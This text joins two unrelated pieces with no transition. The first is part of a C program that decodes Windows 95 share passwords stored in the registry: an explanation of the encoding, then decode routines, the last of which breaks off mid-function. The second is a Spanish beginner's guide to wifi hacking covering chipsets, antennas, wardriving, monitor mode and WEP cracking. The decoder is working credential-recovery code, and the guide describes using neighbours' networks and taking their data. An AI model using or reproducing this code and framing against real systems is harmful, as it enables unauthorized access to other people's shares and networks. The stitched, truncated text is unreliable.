if (!DecodeCharThree(&mybytes[2])) eocc = 1;
if (!DecodeCharFour(&mybytes[3])) eocc = 1;
if (!DecodeCharFive(&mybytes[4])) eocc = 1;
if (!DecodeCharSix(&mybytes[5])) eocc = 1;
if (!DecodeCharSeven(&mybytes[6])) eocc = 1;
if (!DecodeCharEight(&mybytes[7])) eocc = 1;
/* If the password could be decoded, print it */
if (eocc) printf("The encrypted password is invalid. ");
else {
printf("The decoded password is: "");
for (i = 0; i < goupto; i++) printf("%c",mybytes[i]);
printf("" ");
}
} /* End of main() */
/*
* I will document this function, but not the seven other functions
* which decode the subsequent seven characters. All of these functions
* are essentially the same. Multiple functions are necessary though
* because each column of the password has a different set of encoding
* patterns.
*
* The following section will attempt to explain the encoding scheme
* for share passwords as stored in the Windows 95 registry. I will
* try to explain this as clearly as I can, however I really have no
* background in encryption. If you have any questions, please feel
* free to send them to me at snakey@cs.umd.edu.
*
* First off, share passwords can be anywhere from one character to
* eight. "Read only" passwords and "Full access" passwords both use
* the same encoding scheme, and so they both can be decoded by this
* program. There is a one-to-one relationship between the number of
* characters in a password and the number of bytes in the encoded
* password stored in the registry. In fact, each encoded byte directly
* corresponds to the letter in the corresponding column of the
* unencoded password! Ie: If I change a password "passwd" to "masswd",
* only the first byte of the encrypted password will change. Knowing
* this, it is easy to see that all that needs to be done to decode
* the password is to find a mapping from an encoded byte to a decoded
* letter. That's what this program does. Unfortunately, things get
* a little tricky because a letter in the first column of a password
* is encoded using a slightly different algorithm than a letter
* in the second column, and so on.
*
* There is another complexity which we do not really need to worry
* about to a great extent, but we still need to be aware of. Many
* characters, when entered into a password, map to the same encoded
* byte. The best example of this is that both 'A' and 'a' are the
* same as far as share passwords are concerned. There are numerous
* other examples of this, and this allows us to effectively limit the
* range of characters we need to be able to decode. The range of
* ASCII values we will have to be able to decode turns out to be
* from 32 to 159. ASCII values higher than 159 tend to map to
* encoded bytes which also represent more normal ASCII values. So
* if a user manages to create a password with high ASCII values
* in it, that password will still be decoded by this program.
* Although the decoded password won't look the same as the original,
* it will work just as well.
*
* With all of the preliminaries out of the way, I can now move on
* to describing the mapping from an encoded byte to it's corresponding
* ASCII value. I think the best way to describe this would be through
* a picture of exactly how the characters from 32 to 63 are mapped
* out in the code for the first letter in a password. This table goes
* beyond the 80 column format maintained in the rest of this document,
* but it is really the best solution. If the table below doesn't look
* right, load this file up in a text editor that supports greater than
* 80 columns.
*
* Encoded byte (hex) - 1F 1E 1D 1C 1B 1A 19 18 17 16 15 14 13 14 11 10
0F OE 0D 0C 0B 0A 09 08 07 06 05 04 03 02 01 00
* ASCII value (decimal) - 42 43 40 41 46 47 44 45 34 35 32 33 38 39 36 37
58 59 56 57 62 63 60 61 50 51 48 49 54 55 52 53
* Pair # - |_6_| |_5_| |_8_| |_7_| |_2_| |_1_| |_4_| |_3_|
|14_| |13_| |16_| |15_| |10_| |_9_| |12_| |11_|
* Quad # - |__________2__________| |__________1__________|
|__________3__________| |__________4__________|
* 32 byte block # - |______________________________________________
1______________________________________________|
*
* The "Pair #", "Quad #", and "32 byte block #" rows each are there to
* make the general ordering of the code more visible. The first thing to
* note is that the range of encoded byte values runs from 00 to 1f. This
* will not always be the case for the first set of 32 characters. In
* fact, the next set of 32 characters (ASCII 64 to ASCII 95) is not in
* the range of 20 to 3f in encoded form. I never concerned myself with
* predicting exactly where each of the four 32 byte ranges are aligned
* within the range of 0 to 256. In my decoding scheme, I simply specify
* the location of the first character in a 32 byte block (which I have
* pre-determined via experimentation) and determine the locations of the
* rest of the characters in the block relative to the inital value. This
* amounts to a total of four hand-decoded characters for the entire code.
*
* From a starting point which is given (in this case the fact that ASCII
* 32 is encoded as 0x15), my decoding scheme follows a pattern that is
* probably already apparent to you if you have examined the above table
* closely. First, if the encoded byte number is odd, it simple subtracts
* one from this byte number to get the byte number of the encoded form of
* the subsequent character. This is much more simple than it sounds.
* As an example, given that the code for ASCII 32 is 0x15, the program
* knows that the code for ASCII 33 must be 0x14. The tricky part is that
* this is not always true for every code. Recall that there is a different
* coding scheme for each of the 8 columns in a password, and that the above
* table only describes the coding scheme for the first column. Other columns
* reverse this relationship between the two ASCII values of a certain pair.
*
* Pairs are grouped into units of four, appearing in a predefined pattern.
* In this case, the first pair (by first I mean the pair with the lowest
* set of ASCII values) is put in the second slot of a quad (which contains
* four pairs). The second pair is put in the first slot, the third is put
* in the fourth quad, and the fourth is put in the third quad. This changes
* depending on the specific code used (of the 8 possible).
*
* Quads also fill a block in the same manner, however the ordering is NOT
* necessarily the same as the way pairs fit into quads! As I described
* above, there are four blocks, and they fit into the entire range of
* 128 values just as pairs fit into quads and quads fit into blocks,
* via a pattern determined by whoever invented this encoding scheme. It
* is important to realize that the range of 128 possible encoded
* values can be anywhere within the range of 0 to 256. Ie: One block can
* be positioned from 0x00 to 0x1f, while another block in the same code
* can be positioned from 0xa0 to 0xbf.
*
* I realize that the above description is a bit complex, and it doesn't
* really cover much of _how_ my program decodes the the encoded values.
* If you honestly can't understand a word I've said, just go back to
* the table and really take a long look at it. Print it out, put it
* under your pillow when you go to sleep. Sooner or later the order
* of it all will dawn on you and you should be able to step through
* my code and see how it derives its answer, at least for the
* DecodeCharOne() routine. Seven other tables (which I have rough
* copies of here on notebook paper) were needed to come up with
* the seven other decoders for the seven other character places.
*
*/
int DecodeCharOne(unsigned char *mychar) {
int i = 0; /* Keeps track of the decoded character # minus 32 */
int cletter = 1; /* Sets the current letter of the 8 char quad */
int blockl1 = 1; /* Sets the current quad */
int blockl2 = 1; /* Sets the current 32 char block */
int retval = 1;
/* We are on this col of the table: */
unsigned char code = 0x15; /* The code for a space */
/* This is the main loop. It walks through each decoded character, finds
* its corresponding encoded value, and looks to see if that's the same as
* the encoded value we are looking for. If it is, we have found our
* decoded character!
*/
while((i<256) && (code != *mychar)) {
switch (cletter) {
case 1:
code--;
cletter++;
break;
case 2:
code += 3;
cletter++;
break;
case 3:
code--;
cletter++;
break;
case 4:
code -= 5;
cletter++;
break;
case 5:
code--;
cletter++;
break;
case 6:
code+=3;
cletter++;
break;
case 7:
code--;
cletter++;
break;
case 8:
cletter = 1;
switch (blockl1) { /* After we hit character number 8, we have */
case 1: /* to do a relative jump to the next quad */
code += 11;
blockl1++;
break;
case 2:
code -= 21;
blockl1++;
break;
case 3:
code += 11;
blockl1++;
break;
case 4:
blockl1 = 1;
switch (blockl2) { /* After we hit the last quad, we have to */
case 1: /* jump to the next 32 character block. */
code = 0x75;
blockl2++;
break;
case 2:
code = 0x55;
blockl2++;
break;
case 3:
code = 0xb5;
blockl2++;
break;
case 4:
code = 0x15;
blockl2 = 1;
break;
}
break;
}
break;
}
i++;
}
if (i == 256) retval = 0;
else *mychar = i + 32;
return retval;
} /* End of DecodeCharOne() */
int DecodeCharTwo(unsigned char *mychar) {
int i = 0;
int cletter = 1;
int blockl1 = 1;
int blockl2 = 1;
int retval = 1;
unsigned char code = 0xba; /* The code for a space */
while((i<256) && (code != *mychar)) {
switch (cletter) {
case 1:
code++;
cletter++;
break;
case 2:
code -= 3;
cletter++;
break;
case 3:
code++;
cletter++;
break;
case 4:
code += 5;
cletter++;
break;
case 5:
code++;
cletter++;
break;
case 6:
code -= 3;
cletter++;
break;
case 7:
code++;
cletter++;
break;
case 8:
cletter = 1;
switch (blockl1) {
case 1:
code -= 11;
blockl1++;
break;
case 2:
code -= 11;
blockl1++;
break;
case 3:
code -= 11;
blockl1++;
break;
case 4:
blockl1 = 1;
switch (blockl2) {
case 1:
code = 0xda;
blockl2++;
break;
case 2:
code = 0xfa;
blockl2++;
break;
case 3:
code = 0x1a;
blockl2++;
break;
case 4:
code = 0xba;
blockl2 = 1;
break;
}
break;
}
break;
}
i++;
}
if (i == 256) retval = 0;
else *mychar = i + 32;
return retval;
} /* End of DecodeCharTwo() */
int DecodeCharThree(unsigned char *mychar) {
int i = 0;
int cletter = 1;
int blockl1 = 1;
int blockl2 = 1;
int retval = 1;
unsigned char code = 0x6d; /* The code for a space */
while((i<256) && (code != *mychar)) {
switch (cletter) {
case 1:
code--;
cletter++;
break;
case 2:
code += 3;
cletter++;
break;
case 3:
code--;
cletter++;
break;
case 4:
code -= 5;
cletter++;
break;
case 5:
code--;
cletter++;
break;
case 6:
code += 3;
cletter++;
break;
case 7:
code--;
cletter++;
break;
case 8:
cletter = 1;
switch (blockl1) {
case 1:
code -= 5;
blockl1++;
break;
case 2:
code += 27;
blockl1++;
break;
case 3:
code -= 5;
blockl1++;
break;
case 4:
blockl1 = 1;
switch (blockl2) {
case 1:
code = 0x0d;
blockl2++;
break;
case 2:
code = 0x2d;
blockl2++;
break;
case 3:
code = 0xcd;
blockl2++;
break;
case 4:
code = 0x6d;
blockl2 = 1;
break;
}
break;
}
break;
}
i++;
}
if (i == 256) retval = 0;
else *mychar = i + 32;
return retval;
} /* End of DecodeCharThree() */
int DecodeCharFour(unsigned char *mychar) {
int i = 0;
int cletter = 1;
int blockl1 = 1;
int blockl2 = 1;
int retval = 1;
unsigned char code = 0x86; /* The code for a space */
while((i<256) && (code != *mychar)) {
switch (cletter) {
case 1:
code++;
cletter++;
break;
case 2:
code -= 3;
cletter++;
break;
case 3:
code++;
cletter++;
break;
case 4:
code -= 3;
cletter++;
break;
case 5:
code++;
cletter++;
break;
case 6:
code -= 3;
cletter++;
break;
case 7:
code++;
cletter++;
break;
case 8:
cletter = 1;
switch (blockl1) {
case 1:
code += 13;
blockl1++;
break;
case 2:
code += 13;
blockl1++;
break;
case 3:
code += 13;
blockl1++;
break;
case 4:
blockl1 = 1;
switch (blockl2) {
case 1:
code = 0xe6;
blockl2++;
break;
case 2:
code = 0xc6;
blockl2++;
break;
case 3:
code = 0x26;
blockl2++;
break;
case 4:
code = 0x86;
blockl2 = 1;
break;
}
break;
}
break;
}
i++;
}
if (i == 256) retval = 0;
else *mychar = i + 32;
return retval;
} /* End of DecodeCharFour() */
int DecodeCharFive(unsigned char *mychar) {
int i = 0;
int cletter = 1;
int blockl1 = 1;
int blockl2 = 1;
int retval = 1;
unsigned char code = 0x73; /* The code for a space */
while((i<256) && (code != *mychar)) {
switch (cletter) {
case 1:
code--;
cletter++;
break;
case 2:
code--;
cletter++;
break;
case 3:
code--;
cletter++;
break;
case 4:
code += 7;
cletter++;
break;
case 5:
code--;
cletter++;
break;
case 6:
code--;
cletter++;
break;
case 7:
code--;
cletter++;
break;
case 8:
cletter = 1;
switch (blockl1) {
case 1:
code += 7;
blockl1++;
break;
case 2:
code -= 25;
blockl1++;
break;
case 3:
code += 7;
blockl1++;
break;
case 4:
blockl1 = 1;
switch (blockl2) {
case 1:
code = 0x13;
blockl2++;
break;
case 2:
code = 0x33;
blockl2++;
break;
case 3:
code = 0x23;
blockl2++;
break;
case 4:
code = 0x73;
blockl2 = 1;
break;
}
break;
}
break;
}
i++;
}
if (i == 256) retval = 0;
else *mychar = i + 32;
return retval;
} /* End of DecodeCharFive() */
int DecodeCharSix(unsigned char *mychar) {
int i = 0;
int cletter = 1;
int blockl1 = 1;
int blockl2 = 1;
int retval = 1;
unsigned char code = 0x89; /* The code for a space */
while((i<256) && (code != *mychar)) {
switch (cletter) {
case 1:
code--;
cletter++;
break;
case 2:
code += 3;
cletter++;
break;
case 3:
code--;
cletter++;
break;
case 4:
code += 3;
cletter++;
break;
case 5:
code--;
cletter++;
break;
case 6:
code += 3;
cletter++;
break;
case 7:
code--;
cletter++;
break;
case 8:
cletter = 1;
switch (blockl1) {
case 1:
code -= 13;
blockl1++;
break;
case 2:
code += 19;
blockl1++;
break;
case 3:
code -= 13;
blockl1++;
break;
case 4:
blockl1 = 1;
switch (blockl2) {
case 1:
code = 0xe9;
blockl2++;
break;
case 2:
code = 0xc9;
blockl2++;
break;
case 3:
code = 0x29;
blockl2++;
break;
case 4:
code = 0x89;
blockl2 = 1;
break;
}
break;
}
break;
}
i++;
}
if (i == 256) retval = 0;
else *mychar = i + 32;
return retval;
} /* End of DecodeCharSix() */
int DecodeCharSeven(unsigned char *mychar) {
int i = 0;
int cletter = 1;
int blockl1 = 1;
int blockl2 = 1;
int retval = 1;
unsigned char code = 0xf4; /* The code for a space */
while((i<256) && (code != *mychar)) {
switch (cletter) {
case 1:
code++;
cletter++;
break;
case 2:
code++;
cletter++;
break;
case 3:
code++;
cletter++;
break;
case 4:
code -= 7;
cletter++;
break;
case 5:
code++;
cletter++;
break;
case 6:
code++;
cletter++;
break;
case 7:
code++;
cletter++;
break;
case 8:
cletter = 1;
switch (blockl1) {
case 1:
code += 9;
blockl1++;
break;
case 2:
code -= 23;
blockl1++;
break;
case 3:
code += 9;
hackear wireless
CONCEPTOS BÁSICOS DE REDES WIFI Y SU SEGURIDAD (para principiantes)
Autor: zerealkiller
Bueno, algunos ya conocen este texto que publiqué en un hilo y he mejorado y corregido durante bastante tiempo. Ahora creo que está listo para publicarlo en un topic a parte y espero que me comenten lo que les parece, he puesto mucho tiempo y esfuerzo en él. En el futuro, añadiré otros posts en este hilo sobre diversos temas, ataques más avanzados, incluiré explicaciones, nuevos enlaces...
Bienvenidos a este texto que he realizado con la intención de explicar una serie de conceptos básicos sobre las redes wireless (inalámbricas, 802.11), que considero fundamentales para poder entender un poco lo que nos traemos entre manos en el foro de hacking wireless.
Antes de nada comentar que algunos aspectos que no se desarrollan en exceso en este manual, se resumen o esquematizan, se pueden encontrar magistralmente explicados en el taller de Vic_THOR (*Bibliografía) por si necesitan ampliar sus conocimientos.
Si usted no sabe lo que son los estándares 802.11 le vuelvo a recomendar que visite el anterior taller, ya que contiene los conocimientos más básicos que no se explican en este manual. Es necesario conocer también la arquitectura de una red wifi 802.11
Al final del manual se ha introducido un glosario con las definiciones de los términos técnicos de redes 802.11 para su consulta en caso de duda.
INTRODUCCIÓN
El hacking como muchos ya sabrán no consiste en seguir los pasos de una receta de cocina. Consiste en conocer teóricamente las técnicas de ataque, fundamentos básicos del entorno... esto posibilita desarrollar nuevas herramientas de seguridad, combinar diferentes técnicas de ataque para aumentar la efectividad, desarrollar estrategias de ataque...
--------------------------------------------------------------------------------------------------------------------------
Antes de nada me parece vital distinguir entre:
- Hacking wireless:
Consiste en acceder a la red WLAN de otro usuario y utilizar su ancho de banda para conectarse a internet (es decir nos conectamos por el morro). Acceder a los recursos compartidos de los demás ordenadores de la red y sustraer datos confidenciales de todo tipo.
No es está en el fondo la inteción de este manual, sino comprender el tema, montado de una red segura, protección de esta, hacer una auditoría inalámbrica... en fin que lo de siempre léanse la ética del hacker (Muchos por aquí la necesitan y dan ganas de no postear nada pues se imaginan los usos que darán a esta información).
- Hacking una red con un router:
Consiste en ganar acceso a un ordenador que se encuentra detrás de una red y se conecta mediante un server/gateway/router (lo que sea) a internet. Sobre esto también estoy posteando así que si les interesa pueden mirar mis últimos mensajes, e informarse de como funcionan las IPs en una red, la teoría de ataque, métodos para saltarse router y firewall (como conexiones inversas ya sea mediante netcat o troyanos de conexión inversa)
+ Todo sobre hacking de una máquina en red que se conecta a través de un router en:
http://foro.elhacker.net/index.php/topic,62799.msg287872.html#msg287872
Esto lo digo porque son muchos los que no distinguen entre lo uno y lo otro y nada tienen que ver entre ellos.
--------------------------------------------------------------------------------------------------------------------------
La intención de este manual no es otra que puedan entender de qué hablan. Conceptos básicos de las redes 802.11 y su seguridad by Aironjack, espero que les sirva:
Conocimientos previos antes de empezar el tema: Sería imposible tratar todos los puntos partiendo desde cero. Habitualmente se aconseja antes de introducirse en redes:
- Conocer el modelo de capas OSI. *Ir al subforo de redes
- Conocer el protocolo TCP/IP. *Subforo de redes
- Conocer los diferentes estándares IEEE 802.11: Diferentes actualizaciones del estándar inicial en relación a la velocidad de transmisión de datos.
- Topología básica de redes.
1.- Hardware 802.11:
La monitorización de redes consiste en detectar las redes inalámbricas cuyas ondas llegan a nuestro captador de señal.
Equipo necesario: Para esto se necesita una tarjeta de red inalámbrica WNIC (Wireless Network Interface Card. También reciben el nombre de adaptador inalámbricos AIs) + un software para detectar APs (Access Points o puntos de acceso).
AI (Adaptador Inalámbrico): Es necesario saber como se mide la potencia. Nos tienen que sonar conceptos como: IR, EIRP... Para medirla se utilizan varias unidades: milivatios mW o decibelios dB. El modo más preciso es el dBm (decibelio por milivatio)
> Un aumento de 3dB duplica o reduce a la mitad la potencia.
> dBm = dBi
A la hora de escoger una tarjeta inalámbrica se deben tener en cuenta:
> El chipset: El chipset es el chip de la tarjeta, el cerebro si me permiten el término. En el siguiente enlace encontrarán un listado de modelos de tarjetas y sus respectivos chipsets.
http://www.linux-wlan.org/docs/wlan_adapters.html.gz
> Nivel de potencia de salida y posibilidad de ajustarlo
> Sensibilidad en la recepción
> Conectores para antenas externas
> Soporte de algoritmos de encriptación mejorados.
> Imporante: Compatibilidad con el sistema operativo.
Sobre el chipset podría estar hablando horas (jeje quizás no tanto).
1.1.- ¿Qué tarjeta escojo?
Es imposible hacer un estudio de mercado sobre todos los modelos disponibles, estudiar la relación calidad/precio, probar si las mediciones de potencia o distancia son correctas...
Esta pregunta no es nada fácil de responder sin conocer las circustancias del usuario: presupuesto, interés, ataques que piensa desplegar... Quizás no sepan que algunas herramientas están pensandas para actuar con chipsets determinados y que conseguir que funcionen con otros conllevaría adaptar el código, lo cual no está al alcance de muchos usuarios, ya sean avanzados, sino de expertos y profesionales.
En el subapartado de tarjetas inalámbricas (apartado de hardware 802.11) he comentado las especificaciones a considerar antes de la compra, repasemos. Voy a realizar una lista para guiar al comprador inexperto:
---------------------------------------------------------------------------------------------------------------------------> ¿De qué presupuesto dispone? Las tarjetas inalámbricas aún hoy en día no son tan baratas como sus compañeras de red 802.33 Ethernet, pero empiezan a tener precios muy asequibles. Las hay desde 20 euros hasta 300 o más (estas tienen de todo, por ejemplo pigtails que son realmente caros y a la hora de la verdad hay que ponerles cinta aislante para que no se hagan pupa al moverlos)
> ¿Qué sistema operativo tiene?
- windows: Una tarjeta con chipset Atheros es bastante recomendable. No encontrará problemas para ponerla en modo monitor con drivers airopeek de wildpackets, aunque hay más chipsets compatibles (sólo debe consultar el listado en la página de wildpackets). Un modelo interesante podría ser: Conceptronic c54c, aunque mi compañero lovalost me informó que ya no las fabrican, quizás pueda encontrarla rebajada en alguna tienda por internet (bendito stock!)
- Linux y BSD: La recomendación por antonomasia no deja de ser PRISM. ¿por qué? Pues básicamente porque permiten variedad de opciones:
- DoS, ruptura de WEP, fake APs, ataques man-in-the-middle...
- Porque funcionan con la gran mayoría de aplicaciones, etc.
- Están bien documentadas y darán poca guerra, perfectas para principiantes.
- Los linux con kernels a partir de 2.4.18 tienen controladores incorporados.
> ¿pero qué modelo?
No se olviden de cómo saber que chipset tiene nuestro modelo.
http://www.linux-wlan.org/docs/wlan_adapters.html.gz
> ADVERTENCIA! ¿Demasiado fácil, no? Pues hasta ahora sí. Entramos con el conocido y engorroso problema de las revisiones ¿qué son? Actualizaciones de un mismo modelo ¿qué actualizan? Hace un cambio del chipset.
Esto es reamente peligroso, porque podemos comprar un modelo de tarjeta pensando que tiene por ejemplo chipset Prism1 y resulta que tenga Prism Lamadrequeloparió (porque es la tercera revisión, mucho ojito!)
Los nuevos chipsets no suelen tener, cuando salen, mucha cobertura. Dan problemas y en ocasiones no hay drivers para que puedan entrar en modo monitor, porque se están desarrollando. Por eso son muchos los piratas del aire que recomiendan usar Intersil Prisms antiguas, porque lo retro está de moda.
¿pero cómo sé que revisión tiene la tarjeta? Aquí es donde viene lo peor. La revisión es algo que viene escrito en la parte de atrás de las tarjetas y casi ninguna web tiene tal exceso de información que comente la revisión, es por esto que es recomendable comprar la tarjeta en una tienda especializada con un dependiente que comprenda lo que está tratanto de vender y pueda abrir la caja. Sino podemos buscar por internet sobre nuestro modelo y descubrir si tiene revisiones conflictivas.
Cuidense mucho pues sino pueden llevarse una desagradable sorpresa, como por ejemplo encontrarse con un chipset que hayan inventado dos muertos de hambre y no tenga controladores de ningún tipo.
> Pues ahora pueden consultar el listado de tarjetas, donde vienen los chipsets, informarse de si tienen conectores externos para antenas y de qué tipo, buscar en una tienda virtual o google el modelo, precios aproximados y decidirse.
--------------------------------------------------------------------------------------------------------------------------
En estos momentos si tienes una red inalámbrica cuyas ondas de radio lleguen hasta el captador, detectarás el AP correspondiente a esa WLAN (Red LAN wireless).
Pero y si nuetros vecinos aún no se han modernizado y no cuentan con la última tecnología, tan presente hoy en todas las compañías telefónicas (nos regalan un router en los donetes, con los tazos de matutano...)
El proceso se puede implementar con un portátil para poder salir de casa e ir en busca de redes en un centro comercial, otros edificios...
Es aquí donde surge el conocido término wardriving: que no es otra cosa que ir en busca de redes con un coche, así también está el warcycling (en bici para mantenernos en forma), warwalking (dando un paseito, estilo golf)...
Si somos vagos por naturaleza o nos gusta demasiado el sillón-ball (deporte de riesgo donde los haya) podemos aumentar nuestra potencia de detección. Así sin movernos de casa, detectaremos redes a largas distancias.
1.2.- Material necesario para la detección a larga distancia:
- Una antena: Lo que hace la antena es "apuntar", dirigir la señal aumentando su calidad. Desde la perspectiva de un atacante:
> La distancia supone ocultación física y alejamiento.
> Es esencial para ataques sobre la capa física, de denegación de servicios (DoS) y ataques man-in-the-middle (de intermediario).
Para comprender las antenas son necesarios unos conceptos básicos de rediofrecuencia, que no trataremos en este texto, debido a la extensión del asunto. Un par de apuntes:
> La ganancia de un antena es la amplificación de potencia. Se expresa en dBi y es pasiva, ya que la antena como hemos dicho no añade en realidad potencia, sino que enfoca las ondas radiadas para conseguir un haz más estrecho (apunta)
> El ancho de haz determina la zona de cobertura de la antena. Conviene no olvidar su tridimensionalidad.
> "Regla de los 6 dB": Un aumento de 6dB en la EIRP duplica el alcance de transmisión o recepción.
Tipos de antenas. Se diferencian tres tipos generales:
1. Omnidireccionales (360 grados en un plano horizontal)
2. Parcialmente direccionales (De 60 a 120º)
> Antena yagi.
3. De alta direccionalidad
El precio de una antena oscila según sus características y su ganancia: las hay de 25 euros, de 120...
Si tu presupuesto es cero, siempre tienes la opción Mc Gyver. Puedes construirte una antena casera. La pega es que el rendimiento no es muy fiable. Aquí el precio puede ir de 7 euros (antena pringles jeje) a lo que queramos.
Consultar el Recopilatorio de textos y enlaces interesantes para más información sobre su construcción.
Aquí os dejo el enlace donde mi compañero lovalost explica un poco el tema (Si estáis interesados os recomiendo lo leáis detenidamente)
http://foro.elhacker.net/index.php/topic,60677.0.html
lluis_11 dejo en un post este enlace (Considero interesante) sobre el montaje de muchos tipos de antenas distintos bien organizadas.
http://www.antenaswireless.net
Es necesario tener conocimientos sobre como instalar la antena, tipos de conectores (SMA, RP-SMA, SMC, MMCX...)
- Conectando una antena wireless:
http://foro.elhacker.net/index.php/topic,65332.0.html
Podremos instalar nuestra antena tanto en el AI como en el AP, cada forma tienen sus ventajas e inconvenientes que se deben valorar desde la perspectiva de la situación en la que nos encontremos. Interesa recordar, que habitualmente las tarjetas PCI traen conectores externos.
- Un Amplificador RF: Consiguen ganancia activa inyectando pontencia continua (DC). Tipos:
> Unidireccionales: Aumentan la potencia de transmisión.
> Bidireccionales: Incremetan también la sensibilidad de recepción.
Se suelen instalar para compensar las pérdidas debidas a una excesiva longitud del cable coaxial que une la antena y el dispositivo inalámbrico.
--------------------------------------------------------------------------------------------------------------------------
Aquí podemos hablar también del warchalking (Es un lenguaje de símbolos normalmente escritos con tiza en las paredes que informa a los posibles interesados de la existencia de una red inalámbrica en ese punto.)
Detectada una red se puede hacer una marca en el suelo, o bien un mapa virtual con su localización (para esto conviene tener un GPS) que además anota las características de la red: SSID, WEP, direcciones MAC, red abierta o cerrada, DHCP, ancho de banda...
De estas características hablaremos más tarde, todo a su tiempo.
No menciono los símbolos del warchalking pero los podéis encontrar en google o el manual de Vicent Alapont (*Bibliografía).
--------------------------------------------------------------------------------------------------------------------------
1.3.- Tipo de interfaz:
Como en ningún manual he visto ninguna explicación de este tipo, porque seguramente se considera excesivamente básica, me he decidido a hablar un poco del tema, porque estoy seguro de que no todo el mundo lo tiene claro y llega a confundir modelo con el enganche (tipo de interfaz)
Seguro que algunos continúan algo perdidos ¿y entonces qué es eso de PCI, PCMCIA, BUS...? Vamos a intentar explicarlo de manera sencilla.
El modelo de tarjeta inalámbrica viene definido por COMPAÑÍA + MODELO + BUS. Vamos a explicar cada apartado:
- Compañía: Algunas de las más conocidas con: Conceptronic, Linksys, icom, D-Link, Cisco/Aironet ... y son las empresas encargadas de la manufactura y venta de la tarjeta. Estas empresas se encargan de montar la tarjeta, no de desarrollar el chipset y sus drivers, eso va a parte. De ahí que diferentes modelos de una misma compañía puedan tener distintos chipsets (son mundos a parte). De ahí que debamos consultar el chipset en el listado que he dado para no llevarnos a engaño.
- Modelo: Una serie de números y letras que marcan un modelo. No apto para disléxicos, ya que algunos modelos difieren de otros tan solo en una "c" o una "r".
- Tipo de interfaz: Llegamos al quid de la cuestión. Esto entra dentro de fundamentos físicos de los computadores (jejeje que informático) y viene a ser la ranura de entrada, el puerto de conexión de la tarjeta, el método de enganche (esta última es una definicón algo chabacana) ¿pero cuándo uso uno y cuando otro? Para responder a esto, vamos a analizar brevemente los métodos de conexión más comunes y en qué situaciones se utilizan:
> PCI (El acrónimo responde a Peripheral Component Interconnect) Es un bus de interconexión de componente periféricos. Es un bus de computadora estándar para conectar dispositivos periféricos directamente a la tarjeta madre de la computadora (bus local). Comentar que PCI permite configurar el dispositivo de manera dinámica. Se suelen utilizar en ordenadores de SOBREMESA.
Es común que tengan conectores para antenas, esto es una factor a tener en cuenta.
>> MINIPCI: Consiste en un tarjeta PCI de pequeño tamaño para PORTÁTILES.
> PCMCIA : (Personal Computer Memory Card International Association, asociación de la industria de fabricantes de hardware para ordenadores portátiles encargada de la elaboración de estándares). Es un dispostivo normalmente utilizado en computadoras PORTÁTILES para implementar sus posibilidades.
Llegamos a un punto aclaratorio clave: CARD BUS Y PC CARD. Las tarjetas PCMCIA DE 16bits pueden recibir el nombre de PC Card y las de 32 bits CARD BUS (este
termino os debería sonar) Ahora lo pongo a parte para tener el esquema claro.
>> CARD BUS: PCMCIA de 32 bits. se pueden usar con un adaptador USB.
> BUS o USB: (Universal Serial Bus) Provee un estándar de bus serie para conectar dispositivos a un PC. Cuando se diceñó este sistema se pensaba en mejorar la capacidad plug-and-play (permitiendo conectar o desconectar dispositivos sin necesidad de reiniciar. Pero no entra en este texto explicar como funciona plug-and-play, investiguen y aprendan jeje) Hoy en día el USB domina y se ha convertido en el método de conexión más usado, debido a
su dinamismo, desplanzando otros estándares de conexión. Pues estos tipos de conexión, para el que no lo sepa, están en la parte de atrás de la torre del ordenador o del portátil. Cuando hablamos de un tarjeta wireless BUS, hablamos de una tarjeta con un cable Bus para conectar. Son fáciles de instalar, sin embargo, a veces no tan potentes como las anteriores (velocidad, encriptación...). Funcionan tanto en PORTÁTILES como en PCs DE MESA.
> CENTRINO: (Centrino Mobile Technology o Tecnología Móvil Centrino en español) Es una iniciativa comercial de Intel para promocionar una combinación determinada de CPU, chipset de la placa base e interface de red inalámbrica en el diseño de un ordenador personal portátil. Actualmente esta combinación consiste en un procesador Pentium M, un chipset de la familia Intel 855 y una conexión de red del tipo Intel PRO/Wireless 2100 (IEEE 802.11b) o PRO/Wireless 2200 (IEEE 802.11g). Esto va integrado en los portátiles de la marca Intel (no se deben confundir el procesador Pentium M y el Centrino). Por
otra parte muchos consumidores han recibido la impresión de que Centrino es la única forma de obtener conectividad inalámbrica en un portátil.
Este tipo de interfaz no puede entrar en modo RF (monitor) usando Windows.
Una vez tengamos esto claro, les pongo un ejemplo de cómo se debería decir que tarjeta tenemos: "Tengo una Conceptronic c54c tipo PCI" (Si aún con esto, no lo entienden, quizás deberían cambiar de hobby por las tabas o algo así)
Ahora dejo algunas fotos (porque una imagen vale más que mil palabras).
PCI
PCMCIA
2.- Software para detectar APs
Existen varios métodos para detectar APs.
- Monitorización activa: (Barrido activo) Consiste en que el AI envía un paquete sonda o baliza (beacon frame) y en caso de existir un AP al que le llegue la señal, contestará con marco de respuesta sonda (request frame) que contiene los datos de la red.
- Monitorización pasiva: Implica la escucha del AI en busca de marcos baliza que emiten los APs.
Teniendo en cuenta que los usuarios de otros sistema operativos (OS) que no sean windows suelen tener unos conocimientos medios de informática avanzados, me referiré tan solo a los programas para windows.
El más conocido es el Net Stumbler de windows, es un programa de código cerrado que monitoriza las redes de forma activa. Utilizado por aficionados espontáneos del wardriving.
Nota: Wardriving no es lo mismo que netstumbling.
3.- Modo monitor o RFMON:
Consiste en poner nuestra tarjeta wireless en escucha para poder captar los paquetes que transmiten otras redes wireless sin estar asociados a ellas. Esto lo explico de manera más detallada en siguiente post:
- Teoría básica sobre el modo monitor en tarjetas wireless:
http://foro.elhacker.net/index.php/topic,64149.0.html
Nota: El modo promiscuo de las tarjetas de red Ethernet 802.33 no es lo mismo que el modo monitor en redes 802.11.
- ¿Cómo poner la tarjeta en modo monitor con Windows?
http://foro.elhacker.net/index.php/topic,64705.0.html
No todos las tarjetas de red pueden entrar en modo monitor, esto se debe tener en cuenta a la hora de comprarla. Si tenéis un tarjeta centrino, es hora de sacar la cartera.
3.1.- Drivers airopeek según el chipset:
Como son muchos los que preguntan si su tarjeta puede entrar en modo monitor o quizás no sepan encontrar los drivers aún conociendo la página a la que deben dirigirse, voy a listar los chipsets compatibles con airopeek para Windows de Wildpackets. Lo que deben hacer es buscar su modelo de tarjeta en la lista que les dí y enterarse de qué chipset utilizan.
Listado:
- Atheros
- Realtek
- Symbol
- Agere
IMPORTANTE: Cuando ya hayamos crackeado WEP deberemos instalar los antiguos drivers de la tarjeta, porque en modo monitor no es posible conectarse a una red. Esto se explica con más detalle en:
¿Por qué hay que reinstalar los drivers originales una vez tienes la wep?
http://foro.elhacker.net/index.php/topic,65590.0.html
4.- Sniffers o "husmeadores" y WEP crackers:
